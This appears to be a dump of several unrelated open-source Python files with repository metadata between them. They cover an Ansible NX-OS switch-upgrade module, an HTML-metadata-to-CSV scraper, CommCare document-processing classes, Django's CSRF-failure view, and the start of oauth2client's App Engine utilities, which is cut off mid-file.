from ansible.module_utils.basic import AnsibleModule
def check_ansible_timer(module):
'''Check Ansible Timer Values'''
msg = "The 'timeout' provider param value for this module to execute\n"
msg = msg + 'properly is too low.\n'
msg = msg + 'Upgrades can take a long time so the value needs to be set\n'
msg = msg + 'to the recommended value of 500 seconds or higher in the\n'
msg = msg + 'ansible playbook for the nxos_install_os module.\n'
msg = msg + '\n'
msg = msg + 'provider: "{{ connection | combine({\'timeout\': 500}) }}"'
data = module.params.get('provider')
timer_low = False
if data.get('timeout') is None:
timer_low = True
if data.get('timeout') is not None and data.get('timeout') < 500:
timer_low = True
if timer_low:
module.fail_json(msg=msg.split('\n'))
# Output options are 'text' or 'json'
def execute_show_command(module, command, output='text'):
cmds = [{
'command': command,
'output': output,
}]
return run_commands(module, cmds)
def get_platform(module):
"""Determine platform type"""
data = execute_show_command(module, 'show inventory', 'json')
pid = data[0]['TABLE_inv']['ROW_inv'][0]['productid']
if re.search(r'N3K', pid):
type = 'N3K'
elif re.search(r'N5K', pid):
type = 'N5K'
elif re.search(r'N6K', pid):
type = 'N6K'
elif re.search(r'N7K', pid):
type = 'N7K'
elif re.search(r'N9K', pid):
type = 'N9K'
else:
type = 'unknown'
return type
def parse_show_install(data):
"""Helper method to parse the output of the 'show install all impact' or
'install all' commands.
Sample Output:
Installer will perform impact only check. Please wait.
Verifying image bootflash:/nxos.7.0.3.F2.2.bin for boot variable "nxos".
[####################] 100% -- SUCCESS
Verifying image type.
[####################] 100% -- SUCCESS
Preparing "bios" version info using image bootflash:/nxos.7.0.3.F2.2.bin.
[####################] 100% -- SUCCESS
Preparing "nxos" version info using image bootflash:/nxos.7.0.3.F2.2.bin.
[####################] 100% -- SUCCESS
Performing module support checks.
[####################] 100% -- SUCCESS
Notifying services about system upgrade.
[####################] 100% -- SUCCESS
Compatibility check is done:
Module bootable Impact Install-type Reason
------ -------- -------------- ------------ ------
8 yes disruptive reset Incompatible image for ISSU
21 yes disruptive reset Incompatible image for ISSU
Images will be upgraded according to following table:
Module Image Running-Version(pri:alt) New-Version Upg-Required
------ ---------- ---------------------------------------- ------------
8 lcn9k 7.0(3)F3(2) 7.0(3)F2(2) yes
8 bios v01.17 v01.17 no
21 lcn9k 7.0(3)F3(2) 7.0(3)F2(2) yes
21 bios v01.70 v01.70 no
"""
if len(data) > 0:
data = massage_install_data(data)
ud = {'raw': data}
ud['processed'] = []
ud['disruptive'] = False
ud['upgrade_needed'] = False
ud['error'] = False
ud['install_in_progress'] = False
ud['server_error'] = False
ud['upgrade_succeeded'] = False
ud['use_impact_data'] = False
# Check for server errors
if isinstance(data, int):
if data == -1:
ud['server_error'] = True
elif data >= 500:
ud['server_error'] = True
elif data == -32603:
ud['server_error'] = True
return ud
else:
ud['list_data'] = data.split('\n')
for x in ud['list_data']:
# Check for errors and exit if found.
if re.search(r'Pre-upgrade check failed', x):
ud['error'] = True
break
if re.search(r'[I|i]nvalid command', x):
ud['error'] = True
break
if re.search(r'No install all data found', x):
ud['error'] = True
break
# Check for potentially transient conditions
if re.search(r'Another install procedure may be in progress', x):
ud['install_in_progress'] = True
break
if re.search(r'Backend processing error', x):
ud['server_error'] = True
break
if re.search(r'^(-1|5\d\d)$', x):
ud['server_error'] = True
break
# Check for messages indicating a successful upgrade.
if re.search(r'Finishing the upgrade', x):
ud['upgrade_succeeded'] = True
break
if re.search(r'Install has been successful', x):
ud['upgrade_succeeded'] = True
break
# We get these messages when the upgrade is non-disruptive and
# we loose connection with the switchover but far enough along that
# we can be confident the upgrade succeeded.
if re.search(r'timeout trying to send command: install', x):
ud['upgrade_succeeded'] = True
ud['use_impact_data'] = True
break
if re.search(r'[C|c]onnection failure: timed out', x):
ud['upgrade_succeeded'] = True
ud['use_impact_data'] = True
break
# Begin normal parsing.
if re.search(r'----|Module|Images will|Compatibility', x):
ud['processed'].append(x)
continue
# Check to see if upgrade will be disruptive or non-disruptive and
# build dictionary of individual modules and their status.
# Sample Line:
#
# Module bootable Impact Install-type Reason
# ------ -------- ---------- ------------ ------
# 8 yes disruptive reset Incompatible image
rd = r'(\d+)\s+(\S+)\s+(disruptive|non-disruptive)\s+(\S+)'
mo = re.search(rd, x)
if mo:
ud['processed'].append(x)
key = 'm%s' % mo.group(1)
field = 'disruptive'
if mo.group(3) == 'non-disruptive':
ud[key] = {field: False}
else:
ud[field] = True
ud[key] = {field: True}
field = 'bootable'
if mo.group(2) == 'yes':
ud[key].update({field: True})
else:
ud[key].update({field: False})
continue
# Check to see if switch needs an upgrade and build a dictionary
# of individual modules and their individual upgrade status.
# Sample Line:
#
# Module Image Running-Version(pri:alt) New-Version Upg-Required
# ------ ----- ---------------------------------------- ------------
# 8 lcn9k 7.0(3)F3(2) 7.0(3)F2(2) yes
mo = re.search(r'(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(yes|no)', x)
if mo:
ud['processed'].append(x)
key = 'm%s_%s' % (mo.group(1), mo.group(2))
field = 'upgrade_needed'
if mo.group(5) == 'yes':
ud[field] = True
ud[key] = {field: True}
else:
ud[key] = {field: False}
continue
return ud
def massage_install_data(data):
# Transport cli returns a list containing one result item.
# Transport nxapi returns a list containing two items. The second item
# contains the data we are interested in.
default_error_msg = 'No install all data found'
if len(data) == 1:
result_data = data[0]
elif len(data) == 2:
result_data = data[1]
else:
result_data = default_error_msg
# Further processing may be needed for result_data
if len(data) == 2 and isinstance(data[1], dict):
if 'clierror' in data[1].keys():
result_data = data[1]['clierror']
elif 'code' in data[1].keys() and data[1]['code'] == '500':
# We encountered a backend processing error for nxapi
result_data = data[1]['msg']
else:
result_data = default_error_msg
return result_data
def build_install_cmd_set(issu, image, kick, type):
commands = ['terminal dont-ask']
if re.search(r'required|desired|yes', issu):
issu_cmd = 'non-disruptive'
else:
issu_cmd = ''
if type == 'impact':
rootcmd = 'show install all impact'
else:
rootcmd = 'install all'
if kick is None:
commands.append(
'%s nxos %s %s' % (rootcmd, image, issu_cmd))
else:
commands.append(
'%s system %s kickstart %s' % (rootcmd, image, kick))
return commands
def parse_show_version(data):
version_data = {'raw': data[0].split('\n')}
version_data['version'] = ''
version_data['error'] = False
for x in version_data['raw']:
mo = re.search(r'(kickstart|system|NXOS):\s+version\s+(\S+)', x)
if mo:
version_data['version'] = mo.group(2)
continue
if version_data['version'] == '':
version_data['error'] = True
return version_data
def check_mode_legacy(module, issu, image, kick=None):
"""Some platforms/images/transports don't support the 'install all impact'
command so we need to use a different method."""
current = execute_show_command(module, 'show version', 'json')[0]
# Call parse_show_data on empty string to create the default upgrade
# data stucture dictionary
data = parse_show_install('')
upgrade_msg = 'No upgrade required'
# Process System Image
data['error'] = False
tsver = 'show version image bootflash:%s' % image
target_image = parse_show_version(execute_show_command(module, tsver))
if target_image['error']:
data['error'] = True
data['raw'] = target_image['raw']
if current['kickstart_ver_str'] != target_image['version'] and not data['error']:
data['upgrade_needed'] = True
data['disruptive'] = True
upgrade_msg = 'Switch upgraded: system: %s' % tsver
# Process Kickstart Image
if kick is not None and not data['error']:
tkver = 'show version image bootflash:%s' % kick
target_kick = parse_show_version(execute_show_command(module, tkver))
if target_kick['error']:
data['error'] = True
data['raw'] = target_kick['raw']
if current['kickstart_ver_str'] != target_kick['version'] and not data['error']:
data['upgrade_needed'] = True
data['disruptive'] = True
upgrade_msg = upgrade_msg + ' kickstart: %s' % tkver
data['processed'] = upgrade_msg
return data
def check_mode_nextgen(module, issu, image, kick=None):
"""Use the 'install all impact' command for check_mode"""
opts = {'ignore_timeout': True}
commands = build_install_cmd_set(issu, image, kick, 'impact')
data = parse_show_install(load_config(module, commands, True, opts))
# If an error is encountered when issu is 'desired' then try again
# but set issu to 'no'
if data['error'] and issu == 'desired':
issu = 'no'
commands = build_install_cmd_set(issu, image, kick, 'impact')
# The system may be busy from the previous call to check_mode so loop
# until it's done.
data = check_install_in_progress(module, commands, opts)
if data['server_error']:
data['error'] = True
return data
def check_install_in_progress(module, commands, opts):
for attempt in range(20):
data = parse_show_install(load_config(module, commands, True, opts))
if data['install_in_progress']:
sleep(1)
continue
break
return data
def check_mode(module, issu, image, kick=None):
"""Check switch upgrade impact using 'show install all impact' command"""
data = check_mode_nextgen(module, issu, image, kick)
if data['server_error']:
# We encountered an unrecoverable error in the attempt to get upgrade
# impact data from the 'show install all impact' command.
# Fallback to legacy method.
data = check_mode_legacy(module, issu, image, kick)
return data
def do_install_all(module, issu, image, kick=None):
"""Perform the switch upgrade using the 'install all' command"""
impact_data = check_mode(module, issu, image, kick)
if module.check_mode:
# Check mode set in the playbook so just return the impact data.
msg = '*** SWITCH WAS NOT UPGRADED: IMPACT DATA ONLY ***'
impact_data['processed'].append(msg)
return impact_data
if impact_data['error']:
# Check mode discovered an error so return with this info.
return impact_data
elif not impact_data['upgrade_needed']:
# The switch is already upgraded. Nothing more to do.
return impact_data
else:
# If we get here, check_mode returned no errors and the switch
# needs to be upgraded.
if impact_data['disruptive']:
# Check mode indicated that ISSU is not possible so issue the
# upgrade command without the non-disruptive flag.
issu = 'no'
commands = build_install_cmd_set(issu, image, kick, 'install')
opts = {'ignore_timeout': True}
# The system may be busy from the call to check_mode so loop until
# it's done.
upgrade = check_install_in_progress(module, commands, opts)
# Special case: If we encounter a server error at this stage
# it means the command was sent and the upgrade was started but
# we will need to use the impact data instead of the current install
# data.
if upgrade['server_error']:
upgrade['upgrade_succeeded'] = True
upgrade['use_impact_data'] = True
if upgrade['use_impact_data']:
if upgrade['upgrade_succeeded']:
upgrade = impact_data
upgrade['upgrade_succeeded'] = True
else:
upgrade = impact_data
upgrade['upgrade_succeeded'] = False
if not upgrade['upgrade_succeeded']:
upgrade['error'] = True
return upgrade
def main():
argument_spec = dict(
system_image_file=dict(required=True),
kickstart_image_file=dict(required=False),
issu=dict(choices=['required', 'desired', 'no', 'yes'], default='no'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
# This module will error out if the Ansible task timeout value is not
# tuned high enough.
check_ansible_timer(module)
# Get system_image_file(sif), kickstart_image_file(kif) and
# issu settings from module params.
sif = module.params['system_image_file']
kif = module.params['kickstart_image_file']
issu = module.params['issu']
if kif == 'null' or kif == '':
kif = None
install_result = do_install_all(module, issu, sif, kick=kif)
if install_result['error']:
msg = "Failed to upgrade device using image "
if kif:
msg = msg + "files: kickstart: %s, system: %s" % (kif, sif)
else:
msg = msg + "file: system: %s" % sif
module.fail_json(msg=msg, raw_data=install_result['list_data'])
state = install_result['processed']
changed = install_result['upgrade_needed']
module.exit_json(changed=changed, install_state=state, warnings=warnings)
if __name__ == '__main__':
main()
|
gpl-3.0
|
m-rakowski/html-to-csv
|
app/extract.py
|
1
|
2373
|
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import requests
import csv
import re
class Extraction():
def has_class(self,tag):
return tag.has_attr('class')
def get_info_dict(self,url):
r = requests.get(url)
r.encoding = 'utf-8'
data = r.text
soup = BeautifulSoup(data, "html.parser")
info_dict = {'url' : '',
'title' : '',
'author' : '',
'description' : '',
'charset' : '',
'lang' : ''
}
info_dict['url']= url
title_object = soup.find("title")
if title_object is not None:
info_dict['title'] = title_object.string.encode('utf-8')
author_object = soup.find("meta",{"name" : "author"})
if author_object is not None:
info_dict['author'] = author_object['content'].encode('utf-8')
description_object = soup.find("meta",{"name" : "description"})
if description_object is not None:
info_dict['description'] = description_object['content'].encode('utf-8')
charset_object = soup.find("meta", charset = re.compile('\d'))
if charset_object is not None:
info_dict['charset'] = charset_object['charset'].encode('utf-8')
lang_object = soup.find("html", lang = re.compile('\d'))
if lang_object is not None:
info_dict['lang'] = lang_object['lang'].encode('utf-8')
return info_dict
def run(self,urls):
urls = [ url.strip() for url in urls.strip().splitlines() if url]
print(urls)
with open('app/static/sites_metadata.csv', 'w') as csvfile:
fieldnames = ['url', 'title', 'author', 'description', 'charset', 'lang']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames, dialect='excel')
writer.writeheader()
for url in urls:
url='http://'+url if not url[:4].lower() == 'http' else url
row = self.get_info_dict(url)
print("ROW: ",row)
writer.writerow(row)
print("Data extraction successful.")
|
bsd-3-clause
|
qedsoftware/commcare-hq
|
corehq/util/doc_processor/interface.py
|
1
|
11487
|
import weakref
from abc import ABCMeta, abstractmethod
from datetime import datetime
import six
from corehq.util.pagination import PaginationEventHandler, TooManyRetries
class BulkProcessingFailed(Exception):
pass
DOCS_SKIPPED_WARNING = """
WARNING {} documents were not processed due to concurrent modification
during migration. Run the migration again until you do not see this
message.
"""
class BaseDocProcessor(six.with_metaclass(ABCMeta)):
"""Base class for processors that get passed"""
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def process_doc(self, doc):
"""Process a single document
:param doc: The document dict to be processed.
:returns: True if doc was processed successfully else False. If this returns False
the document migration will be retried later.
"""
raise NotImplementedError
def process_bulk_docs(self, docs):
"""Process a batch of documents. The default implementation passes
each doc in turn to ``process_doc``.
:param docs: A list of document dicts to be processed.
:returns: True if doc was processed successfully else False.
If this returns False the processing will be halted.
"""
return all(self.process_doc(doc) for doc in docs)
def handle_skip(self, doc):
"""Called when a document is going to be skipped i.e. it has been
retried > max_retries.
:returns: True to indicate that the skip has been handled
or False to stop execution
"""
return False
def processing_complete(self, skipped):
pass
def should_process(self, doc):
"""
:param doc: the document to filter
:return: True if this doc should be migrated
"""
return True
class ProcessorProgressLogger(object):
def progress_starting(self, total, previously_visited):
print("Processing {} documents{}: ...".format(
total,
" (~{} already processed)".format(previously_visited) if previously_visited else ""
))
def document_skipped(self, doc_dict):
print("Skip: {doc_type} {_id}".format(**doc_dict))
def progress(self, processed, visited, total, time_elapsed, time_remaining):
print("Processed {}/{} of {} documents in {} ({} remaining)"
.format(processed, visited, total, time_elapsed, time_remaining))
def progress_complete(self, processed, visited, total, previously_visited, filtered):
print("Processed {}/{} of {} documents ({} previously processed, {} filtered out).".format(
processed,
visited,
total,
previously_visited,
filtered
))
class DocumentProvider(six.with_metaclass(ABCMeta)):
@abstractmethod
def get_document_iterator(self, chunk_size, event_handler=None):
"""
:param chunk_size: Maximum number of records to read from the database at one time
:param event_handler: instance of ``PaginateViewLogHandler`` to be notified of view events.
:return: an instance of ``ResumableFunctionIterator``
"""
raise NotImplementedError
@abstractmethod
def get_total_document_count(self):
"""
:return: the total count of documents expected
"""
raise NotImplementedError
class DocumentProcessorController(object):
"""Process Docs
:param document_provider: A ``DocumentProvider`` object
:param doc_processor: A ``BaseDocProcessor`` object used to process documents.
:param reset: Reset existing processor state (if any), causing all
documents to be reconsidered for processing, if this is true.
:param max_retry: Number of times to retry processing a document before giving up.
:param chunk_size: Maximum number of records to read from couch at
one time. It may be necessary to use a smaller chunk size if the
records being processed are very large and the default chunk size of
100 would exceed available memory.
:param event_handler: A ``PaginateViewLogHandler`` object to be notified of pagination events.
:param progress_logger: A ``ProcessorProgressLogger`` object to notify of progress events.
"""
def __init__(self, document_provider, doc_processor, reset=False, max_retry=2,
chunk_size=100, event_handler=None, progress_logger=None):
self.doc_processor = doc_processor
self.reset = reset
self.max_retry = max_retry
self.chunk_size = chunk_size
self.progress_logger = progress_logger or ProcessorProgressLogger()
self.document_provider = document_provider
self.document_iterator = self.document_provider.get_document_iterator(chunk_size, event_handler)
self.visited = 0
self.previously_visited = 0
self.total = 0
self.processed = 0
self.skipped = 0
self.start = None
def has_started(self):
return bool(self.document_iterator.get_iterator_detail('progress'))
@property
def session_visited(self):
return self.visited - self.previously_visited
@property
def session_total(self):
return self.total - self.previously_visited
@property
def attempted(self):
return self.processed + self.skipped
@property
def timing(self):
"""Returns a tuple of (elapsed, remaining)"""
elapsed = datetime.now() - self.start
if self.session_visited > self.session_total:
remaining = "?"
else:
session_remaining = self.session_total - self.session_visited
remaining = elapsed / self.session_visited * session_remaining
return elapsed, remaining
def _setup(self):
self.total = self.document_provider.get_total_document_count()
if self.reset:
self.document_iterator.discard_state()
elif self.document_iterator.get_iterator_detail('progress'):
info = self.document_iterator.get_iterator_detail('progress')
old_total = info["total"]
# Estimate already visited based on difference of old/new
# totals. The theory is that new or deleted records will be
# evenly distributed across the entire set.
self.visited = int(round(float(self.total) / old_total * info["visited"]))
self.previously_visited = self.visited
self.progress_logger.progress_starting(self.total, self.previously_visited)
self.start = datetime.now()
def run(self):
"""
:returns: A tuple `(<num processed>, <num skipped>)`
"""
self._setup()
with self.doc_processor:
for doc in self.document_iterator:
self._process_doc(doc)
self._update_progress()
self._processing_complete()
return self.processed, self.skipped
def _process_doc(self, doc):
if not self.doc_processor.should_process(doc):
return
ok = self.doc_processor.process_doc(doc)
if ok:
self.processed += 1
else:
try:
self.document_iterator.retry(doc['_id'], self.max_retry)
except TooManyRetries:
if not self.doc_processor.handle_skip(doc):
raise
else:
self.progress_logger.document_skipped(doc)
self.skipped += 1
def _update_progress(self):
self.visited += 1
if self.visited % self.chunk_size == 0:
self.document_iterator.set_iterator_detail('progress', {"visited": self.visited, "total": self.total})
if self.attempted % self.chunk_size == 0:
elapsed, remaining = self.timing
self.progress_logger.progress(
self.processed, self.visited, self.total, elapsed, remaining
)
def _processing_complete(self):
if self.session_visited:
self.document_iterator.set_iterator_detail('progress', {"visited": self.visited, "total": self.total})
self.doc_processor.processing_complete(self.skipped)
self.progress_logger.progress_complete(
self.processed,
self.visited,
self.total,
self.previously_visited,
self.session_visited - self.attempted
)
if self.skipped:
print(DOCS_SKIPPED_WARNING.format(self.skipped))
class BulkDocProcessorEventHandler(PaginationEventHandler):
def __init__(self, processor):
self.processor_ref = weakref.ref(processor)
def page_end(self, total_emitted, duration, *args, **kwargs):
processor = self.processor_ref()
if processor:
processor.process_chunk()
else:
raise BulkProcessingFailed("Processor has gone away")
class BulkDocProcessor(DocumentProcessorController):
"""Process docs in batches
The bulk doc processor will send a batch of documents to the document
processor. If the processor does not respond with True then
the iteration is halted. Restarting the iteration will start by
re-sending the previous chunk to the processor.
The size of the batches passed to the document processor may vary
depending on how they are being filtered by the
document processor but will never exceed ``chunk_size``.
:param document_provider: A ``DocumentProvider`` object
:param doc_processor: A ``BaseDocProcessor`` object used to process documents.
:param reset: Reset existing processor state (if any), causing all
documents to be reconsidered for processing, if this is true.
:param max_retry: Number of times to retry processing a document before giving up.
:param chunk_size: Maximum number of records to read from couch at
one time. It may be necessary to use a smaller chunk size if the
records being processed are very large and the default chunk size of
100 would exceed available memory.
:param progress_logger: A ``ProcessorProgressLogger`` object to notify of progress events.
"""
def __init__(self, document_provider, doc_processor, reset=False, max_retry=2,
chunk_size=100, progress_logger=None):
event_handler = BulkDocProcessorEventHandler(self)
super(BulkDocProcessor, self).__init__(
document_provider, doc_processor, reset, max_retry, chunk_size,
event_handler, progress_logger
)
self.changes = []
def _process_doc(self, doc):
if self.doc_processor.should_process(doc):
self.changes.append(doc)
def process_chunk(self):
"""Called by the BulkDocProcessorLogHandler"""
ok = self.doc_processor.process_bulk_docs(self.changes)
if ok:
self.processed += len(self.changes)
self.changes = []
else:
raise BulkProcessingFailed("Processing batch failed")
def _update_progress(self):
self.visited += 1
if self.visited % self.chunk_size == 0:
self.document_iterator.set_iterator_detail('progress', {"visited": self.visited, "total": self.total})
elapsed, remaining = self.timing
self.progress_logger.progress(
self.total, self.processed, self.visited, elapsed, remaining
)
|
bsd-3-clause
|
rooshilp/CMPUT410Lab6
|
virt_env/virt1/lib/python2.7/site-packages/django/views/csrf.py
|
107
|
4958
|
from django.conf import settings
from django.http import HttpResponseForbidden
from django.template import Context, Template
from django.utils.translation import ugettext as _
# We include the template inline since we need to be able to reliably display
# this error message, especially for the sake of developers, and there isn't any
# other way of making it available independent of what is in the settings file.
# Only the text appearing with DEBUG=False is translated. Normal translation
# tags cannot be used with this inline templates as makemessages would not be
# able to discover the strings.
CSRF_FAILURE_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>403 Forbidden</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
#info { background:#f6f6f6; }
#info ul { margin: 0.5em 4em; }
#info p, #summary p { padding-top:10px; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ title }} <span>(403)</span></h1>
<p>{{ main }}</p>
{% if no_referer %}
<p>{{ no_referer1 }}</p>
<p>{{ no_referer2 }}</p>
{% endif %}
{% if no_cookie %}
<p>{{ no_cookie1 }}</p>
<p>{{ no_cookie2 }}</p>
{% endif %}
</div>
{% if DEBUG %}
<div id="info">
<h2>Help</h2>
{% if reason %}
<p>Reason given for failure:</p>
<pre>
{{ reason }}
</pre>
{% endif %}
<p>In general, this can occur when there is a genuine Cross Site Request Forgery, or when
<a
href='http://docs.djangoproject.com/en/dev/ref/contrib/csrf/#ref-contrib-csrf'>Django's
CSRF mechanism</a> has not been used correctly. For POST forms, you need to
ensure:</p>
<ul>
<li>Your browser is accepting cookies.</li>
<li>The view function uses <a
href='http://docs.djangoproject.com/en/dev/ref/templates/api/#subclassing-context-requestcontext'><code>RequestContext</code></a>
for the template, instead of <code>Context</code>.</li>
<li>In the template, there is a <code>{% templatetag openblock %} csrf_token
{% templatetag closeblock %}</code> template tag inside each POST form that
targets an internal URL.</li>
<li>If you are not using <code>CsrfViewMiddleware</code>, then you must use
<code>csrf_protect</code> on any views that use the <code>csrf_token</code>
template tag, as well as those that accept the POST data.</li>
</ul>
<p>You're seeing the help section of this page because you have <code>DEBUG =
True</code> in your Django settings file. Change that to <code>False</code>,
and only the initial error message will be displayed. </p>
<p>You can customize this page using the CSRF_FAILURE_VIEW setting.</p>
</div>
{% else %}
<div id="explanation">
<p><small>{{ more }}</small></p>
</div>
{% endif %}
</body>
</html>
"""
def csrf_failure(request, reason=""):
"""
Default view used when request fails CSRF protection
"""
from django.middleware.csrf import REASON_NO_REFERER, REASON_NO_CSRF_COOKIE
t = Template(CSRF_FAILURE_TEMPLATE)
c = Context({
'title': _("Forbidden"),
'main': _("CSRF verification failed. Request aborted."),
'reason': reason,
'no_referer': reason == REASON_NO_REFERER,
'no_referer1': _(
"You are seeing this message because this HTTPS site requires a "
"'Referer header' to be sent by your Web browser, but none was "
"sent. This header is required for security reasons, to ensure "
"that your browser is not being hijacked by third parties."),
'no_referer2': _(
"If you have configured your browser to disable 'Referer' headers, "
"please re-enable them, at least for this site, or for HTTPS "
"connections, or for 'same-origin' requests."),
'no_cookie': reason == REASON_NO_CSRF_COOKIE,
'no_cookie1': _(
"You are seeing this message because this site requires a CSRF "
"cookie when submitting forms. This cookie is required for "
"security reasons, to ensure that your browser is not being "
"hijacked by third parties."),
'no_cookie2': _(
"If you have configured your browser to disable cookies, please "
"re-enable them, at least for this site, or for 'same-origin' "
"requests."),
'DEBUG': settings.DEBUG,
'more': _("More information is available with DEBUG=True."),
})
return HttpResponseForbidden(t.render(c), content_type='text/html')
|
apache-2.0
|
googleglass/mirror-catfacts-python
|
libs/oauth2client/appengine.py
|
154
|
32524
|
# Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for Google App Engine
Utilities for making it easier to use OAuth 2.0 on Google App Engine.
"""
__author__ = '[email protected] (Joe Gregorio)'
import base64
import cgi
import httplib2
import logging
import os
import pickle
import threading
import time
from google.appengine.api import app_identity
from google.appengine.api import memcache
from google.appengine.api import users
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import login_required
from google.appengine.ext.webapp.util import run_wsgi_app
from oauth2client import GOOGLE_AUTH_URI
from oauth2client import GOOGLE_REVOKE_URI
from oauth2client import GOOGLE_TOKEN_URI
from oauth2client import clientsecrets
from oauth2client import util
from oauth2client import xsrfutil
from oauth2client.anyjson import simplejson
from oauth2client.client import AccessTokenRefreshError
from oauth2client.client import AssertionCredentials
from oauth2client.client import Credentials
from oauth2client.client import Flow
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.client import Storage
# TODO(dhermes): Resolve import issue.
# This is a temporary fix for a Google internal issue.
try:
from google.appengine.ext import ndb
except ImportError:
ndb = None
logger = logging.getLogger(__name__)
OAUTH2CLIENT_NAMESPACE = 'oauth2client#ns'
XSRF_MEMCACHE_ID = 'xsrf_secret_key'
def _safe_html(s):
"""Escape text to make it safe to display.
Args:
s: string, The text to escape.
Returns:
The escaped text as a string.
"""
return cgi.escape(s, quote=1).replace("'", ''')
class InvalidClientSecretsError(Exception):
"""The client_secrets.json file is malformed or missing required fields."""
class InvalidXsrfTokenError(Exception):
"""The XSRF token is invalid or expired."""
class SiteXsrfSecretKey(db.Model):
"""Storage for the sites XSRF secret key.
There will only be one instance stored of this model, the one used for the
site.
"""
secret = db.StringProperty()
if ndb is not None:
class SiteXsrfSecretKeyNDB(ndb.Model):
"""NDB Model for storage for the sites XSRF secret key.
Since this model uses the same kind as SiteXsrfSecretKey, it can be used
interchangeably. This simply provides an NDB model for interacting with the
same data the DB model interacts with.
There should only be one instance stored of this model, the one used for the
site.
"""
secret = ndb.StringProperty()
@classmethod
def _get_kind(cls):
"""Return the kind name for this class."""
return 'SiteXsrfSecretKey'
def _generate_new_xsrf_secret_key():
"""Returns a random XSRF secret key.
"""
return os.urandom(16).encode("hex")
def xsrf_secret_key():
"""Return the secret key for use for XSRF protection.
If the Site entity does not have a secret key, this method will also create
one and persist it.
Returns:
The secret key.
"""
secret = memcache.get(XSRF_MEMCACHE_ID, namespace=OAUTH2CLIENT_NAMESPACE)
if not secret:
# Load the one and only instance of SiteXsrfSecretKey.
model = SiteXsrfSecretKey.get_or_insert(key_name='site')
if not model.secret:
model.secret = _generate_new_xsrf_secret_key()
model.put()
secret = model.secret
memcache.add(XSRF_MEMCACHE_ID, secret, namespace=OAUTH2CLIENT_NAMESPACE)
return str(secret)
class AppAssertionCredentials(AssertionCredentials):
"""Credentials object for App Engine Assertion Grants
This object will allow an App Engine application to identify itself to Google
and other OAuth 2.0 servers that can verify assertions. It can be used for the
purpose of accessing data stored under an account assigned to the App Engine
application itself.
This credential does not require a flow to instantiate because it represents
a two legged flow, and therefore has all of the required information to
generate and refresh its own access tokens.
"""
@util.positional(2)
def __init__(self, scope, **kwargs):
"""Constructor for AppAssertionCredentials
Args:
scope: string or iterable of strings, scope(s) of the credentials being
requested.
"""
self.scope = util.scopes_to_string(scope)
# Assertion type is no longer used, but still in the parent class signature.
super(AppAssertionCredentials, self).__init__(None)
@classmethod
def from_json(cls, json):
data = simplejson.loads(json)
return AppAssertionCredentials(data['scope'])
def _refresh(self, http_request):
"""Refreshes the access_token.
Since the underlying App Engine app_identity implementation does its own
caching we can skip all the storage hoops and just to a refresh using the
API.
Args:
http_request: callable, a callable that matches the method signature of
httplib2.Http.request, used to make the refresh request.
Raises:
AccessTokenRefreshError: When the refresh fails.
"""
try:
scopes = self.scope.split()
(token, _) = app_identity.get_access_token(scopes)
except app_identity.Error, e:
raise AccessTokenRefreshError(str(e))
self.access_token = token
class FlowProperty(db.Property):
"""App Engine datastore Property for Flow.
Utility property that allows easy storage and retrieval of an
oauth2client.Flow"""
# Tell what the user type is.
data_type = Flow
# For writing to datastore.
def get_value_for_datastore(self, model_instance):
flow = super(FlowProperty,
self).get_value_for_datastore(model_instance)
return db.Blob(pickle.dumps(flow))
# For reading from datastore.
def make_value_from_datastore(self, value):
if value is None:
return None
return pickle.loads(value)
def validate(self, value):
if value is not None and not isinstance(value, Flow):
raise db.BadValueError('Property %s must be convertible '
'to a FlowThreeLegged instance (%s)' %
(self.name, value))
return super(FlowProperty, self).validate(value)
def empty(self, value):
return not value
if ndb is not None:
class FlowNDBProperty(ndb.PickleProperty):
"""App Engine NDB datastore Property for Flow.
Serves the same purpose as the DB FlowProperty, but for NDB models. Since
PickleProperty inherits from BlobProperty, the underlying representation of
the data in the datastore will be the same as in the DB case.
Utility property that allows easy storage and retrieval of an
oauth2client.Flow
"""
def _validate(self, value):
"""Validates a value as a proper Flow object.
Args:
value: A value to be set on the property.
Raises:
TypeError if the value is not an instance of Flow.
"""
logger.info('validate: Got type %s', type(value))
if value is not None and not isinstance(value, Flow):
raise TypeError('Property %s must be convertible to a flow '
'instance; received: %s.' % (self._name, value))
class CredentialsProperty(db.Property):
"""App Engine datastore Property for Credentials.
Utility property that allows easy storage and retrieval of
oath2client.Credentials
"""
# Tell what the user type is.
data_type = Credentials
# For writing to datastore.
def get_value_for_datastore(self, model_instance):
logger.info("get: Got type " + str(type(model_instance)))
cred = super(CredentialsProperty,
self).get_value_for_datastore(model_instance)
if cred is None:
cred = ''
else:
cred = cred.to_json()
return db.Blob(cred)
# For reading from datastore.
def make_value_from_datastore(self, value):
logger.info("make: Got type " + str(type(value)))
if value is None:
return None
if len(value) == 0:
return None
try:
credentials = Credentials.new_from_json(value)
except ValueError:
credentials = None
return credentials
def validate(self, value):
value = super(CredentialsProperty, self).validate(value)
logger.info("validate: Got type " + str(type(value)))
if value is not None and not isinstance(value, Credentials):
raise db.BadValueError('Property %s must be convertible '
'to a Credentials instance (%s)' %
(self.name, value))
#if value is not None and not isinstance(value, Credentials):
# return None
return value
if ndb is not None:
